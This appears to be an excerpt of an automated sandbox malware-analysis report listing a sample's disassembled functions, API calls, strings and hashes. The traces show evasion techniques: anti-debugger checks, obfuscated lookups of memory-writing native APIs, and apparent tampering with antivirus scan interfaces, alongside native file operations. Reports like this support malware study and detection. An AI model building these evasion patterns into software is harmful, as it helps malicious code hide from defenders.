                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C55C26
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C55C6D
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C55C7D
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C55CA5
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C55CB5
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C55CDB
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C55CEB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1759228003-2375825460
                                                                        • Opcode ID: 3cfad93342f87fc8e33df085fad06b9a0186bf7e8e505a153f5832f266137058
                                                                        • Instruction ID: deacbc75b481d98f1897b06b958e61282c5da369a31fc3c28293e46eaa9a96c1
                                                                        • Opcode Fuzzy Hash: 3cfad93342f87fc8e33df085fad06b9a0186bf7e8e505a153f5832f266137058
                                                                        • Instruction Fuzzy Hash: 4751C971A4066C7EFB25D6E48C49FEF77AD9B04380F4401A1AE04E6181E7B4DBC48F69
                                                                        Function 02C6894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 12432 2c6894c-2c68971 LoadLibraryW 12433 2c68973-2c6898b GetProcAddress 12432->12433 12434 2c689bb-2c689c1 12432->12434 12435 2c689b0-2c689b6 FreeLibrary 12433->12435 12436 2c6898d-2c689ac call 2c67d78 12433->12436 12435->12434 12436->12435 12439 2c689ae 12436->12439 12439->12435
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
                                                                          • Part of subcall function 02C67D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                        • API String ID: 1002360270-4067648912
                                                                        • Opcode ID: f61153f747e0721065eb5c59c9d48b548aad4efe79a7500a086887c2bcd419c5
                                                                        • Instruction ID: 39a23035edbfed7650c446b6df96573197535e02a31043de03deeb405cfe44a8
                                                                        • Opcode Fuzzy Hash: f61153f747e0721065eb5c59c9d48b548aad4efe79a7500a086887c2bcd419c5
                                                                        • Instruction Fuzzy Hash: 6CF04F71AC23245FE310A669A889F67B7EC9785B14F000B6ABD0CC7140C775589CCB54
                                                                        Function 02C6F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 12449 2c6f744-2c6f75e GetModuleHandleW 12450 2c6f760-2c6f772 GetProcAddress 12449->12450 12451 2c6f78a-2c6f792 12449->12451 12450->12451 12452 2c6f774-2c6f784 CheckRemoteDebuggerPresent 12450->12452 12452->12451 12453 2c6f786 12452->12453 12453->12451
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 02C6F754
                                                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02C6F766
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C6F77D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                        • API String ID: 35162468-539270669
                                                                        • Opcode ID: bcd8b10ef9ba01c2a9a8afcdcd09e3245f918615b0bdaf46cefb5246d477b0c5
                                                                        • Instruction ID: a0a11fc0cd6a90e9695005813acf87d4e6b64fb429019c4854522dacc99c8447
                                                                        • Opcode Fuzzy Hash: bcd8b10ef9ba01c2a9a8afcdcd09e3245f918615b0bdaf46cefb5246d477b0c5
                                                                        • Instruction Fuzzy Hash: AAF0A77090425CBAEB10A6B898CC7ECFBBD5B05329F6443A8D836A25C1E7714780CA55
                                                                        Function 02C6DD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 02C54F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C54F2E
                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C6DE40), ref: 02C6DDAB
                                                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C6DE40), ref: 02C6DDDB
                                                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C6DDF0
                                                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C6DE1C
                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C6DE25
                                                                          • Part of subcall function 02C54C60: SysFreeString.OLEAUT32(02C6F4A4), ref: 02C54C6E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                        • String ID:
                                                                        • API String ID: 1897104825-0
                                                                        • Opcode ID: 1d4c02cc90b8fa0511275869e093dc1327992a52a0082d09b4abafe54162b2d6
                                                                        • Instruction ID: 386770ab28c20652529fb240fbe8a3895cb07e298bd4eac74557ad21f53564fb
                                                                        • Opcode Fuzzy Hash: 1d4c02cc90b8fa0511275869e093dc1327992a52a0082d09b4abafe54162b2d6
                                                                        • Instruction Fuzzy Hash: 3B210371B40319BAEB11EBD4CC96FEE77BDEB48700F500561B601F71C0DA74AA449B94
                                                                        Function 02C6E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C6E5F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CheckConnectionInternet
                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                        • API String ID: 3847983778-3852638603
                                                                        • Opcode ID: 31138f37b3c130a6a9ceee505fdcf93dac99755fa17547dd529156e687fb5671
                                                                        • Instruction ID: de1d694314b810a55f7577693163c7dca13be4d6a48dfda7cdb7a868408a74e2
                                                                        • Opcode Fuzzy Hash: 31138f37b3c130a6a9ceee505fdcf93dac99755fa17547dd529156e687fb5671
                                                                        • Instruction Fuzzy Hash: 08411D35A0011C9BEB24EFA4D881EEEB3FAEF88700F104422E441E7250DA74ED81EF59
                                                                        Function 02C6DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 02C54F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C54F2E
                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C6DD5E), ref: 02C6DCCB
                                                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C6DD05
                                                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C6DD32
                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C6DD3B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                        • String ID:
                                                                        • API String ID: 3764614163-0
                                                                        • Opcode ID: 7d10a4db93aef1dd8997e24699fe283f2287a78bfa1de0ad0a80b17c29e48373
                                                                        • Instruction ID: 732bbab4e5bf9047957659f0f0057a21fad63443e15aaec8bd360790ebc74e01
                                                                        • Opcode Fuzzy Hash: 7d10a4db93aef1dd8997e24699fe283f2287a78bfa1de0ad0a80b17c29e48373
                                                                        • Instruction Fuzzy Hash: 0321F171A40219BAEB20EF94CD86FEEB7BDEB44B00F514561B601F71C0D7B0AA449B64
                                                                        Function 02C67A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C67A9F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                        • API String ID: 4072585319-445027087
                                                                        • Opcode ID: 9d0d44c8a624d95eaddc159647302b52b9e1ec4ee9c9d13d08f198a5e2127a34
                                                                        • Instruction ID: 076dd60738a9a9bc3908b8a7235bace968e4c6e3b7de39573de09fa84d960f80
                                                                        • Opcode Fuzzy Hash: 9d0d44c8a624d95eaddc159647302b52b9e1ec4ee9c9d13d08f198a5e2127a34
                                                                        • Instruction Fuzzy Hash: 08116D75680208BFEB14EFA4DC85FAEB7EEEB48704F404965B904D7200D630EA58DB24
                                                                        Function 02C67A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C67A9F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                        • API String ID: 4072585319-445027087
                                                                        • Opcode ID: 5942078fdce34e0420fa7a4d1d716000bd067d5d581341c09685cce8d63906d0
                                                                        • Instruction ID: fc4646bf6936ad0ef77cb89793c415e988217e34a209ee4c6aa8fbdfb3cc77d8
                                                                        • Opcode Fuzzy Hash: 5942078fdce34e0420fa7a4d1d716000bd067d5d581341c09685cce8d63906d0
                                                                        • Instruction Fuzzy Hash: A8118075680208BFEB14EFA4DC85FAEB7EEEB48704F404965B904D7200D630EA58DB24
                                                                        Function 02C67D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                        • String ID: Ntdll$yromeMlautriVetirW
                                                                        • API String ID: 2719805696-3542721025
                                                                        • Opcode ID: 2697415d19213f49e1e0040d507dbd3c129c27d852b3726782bf0eaa85981689
                                                                        • Instruction ID: 1d8907b0fd5489ab72852a42492ab790f458655153c9cfc20d2cac688785b8a7
                                                                        • Opcode Fuzzy Hash: 2697415d19213f49e1e0040d507dbd3c129c27d852b3726782bf0eaa85981689
                                                                        • Instruction Fuzzy Hash: 32018C75640248AFDB14EFA8DC89EAAB7EDEB49704F504861B804D7600D630ED68DB64
                                                                        Function 02C6DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlI.N(?,?,00000000,02C6DC7E), ref: 02C6DC2C
                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC42
                                                                        • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Path$DeleteFileNameName_
                                                                        • String ID:
                                                                        • API String ID: 4284456518-0
                                                                        • Opcode ID: a1c3e4373ac7540a623920c6fc329aec33e1dde1f02df8e86b4832356ef1f33c
                                                                        • Instruction ID: c9b9804c89af07ef03f13cfe1ac3718f30fc9761947d8188dbb3975999d31888
                                                                        • Opcode Fuzzy Hash: a1c3e4373ac7540a623920c6fc329aec33e1dde1f02df8e86b4832356ef1f33c
                                                                        • Instruction Fuzzy Hash: 9001A235B4460D7EEB05DBA0DDC5FED77BEAB84304F5104E2D202E6081DAB4AB049B24
                                                                        Function 02C6DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C54F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C54F2E
                                                                        • RtlI.N(?,?,00000000,02C6DC7E), ref: 02C6DC2C
                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC42
                                                                        • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC61
                                                                          • Part of subcall function 02C54C60: SysFreeString.OLEAUT32(02C6F4A4), ref: 02C54C6E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                        • String ID:
                                                                        • API String ID: 1530111750-0
                                                                        • Opcode ID: f5521a301b8e8a8b17cbb20ceb8c251cdea35bd8fed88cbe5174651d802fa1ae
                                                                        • Instruction ID: c78d8dc7f0a20bbf37d7083cb41bc39b57b796a2b4be6fb3ba5048bb31cd31d6
                                                                        • Opcode Fuzzy Hash: f5521a301b8e8a8b17cbb20ceb8c251cdea35bd8fed88cbe5174651d802fa1ae
                                                                        • Instruction Fuzzy Hash: 06014471A4020DBEDB11EBA0DD86FDDB3FDEB48700F5044B1E602E2180EB74AB049A64
                                                                        Function 02C66DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C66D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02C66DB9,?,?,?,00000000), ref: 02C66D99
                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,02C66EAC,00000000,00000000,02C66E2B,?,00000000,02C66E9B), ref: 02C66E17
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFromInstanceProg
                                                                        • String ID:
                                                                        • API String ID: 2151042543-0
                                                                        • Opcode ID: 6b6c6da07c0399a673042ef3163bf2c67f4cc067f011ca669eebbf9a0cb63905
                                                                        • Instruction ID: ffb5f9ca39215a220a5f33dbeb062a32324231fa91c8d9d385304be0f173939a
                                                                        • Opcode Fuzzy Hash: 6b6c6da07c0399a673042ef3163bf2c67f4cc067f011ca669eebbf9a0cb63905
                                                                        • Instruction Fuzzy Hash: FC012631608744AEFB15EFA1DCA687FBBBDE749B00F610835F805E2680E6389900D864
                                                                        Function 02C6AD98 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C6AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C6ADA3,?,?,02C6AE35,00000000,02C6AF11), ref: 02C6AB30
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C6AB48
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C6AB5A
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C6AB6C
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C6AB7E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C6AB90
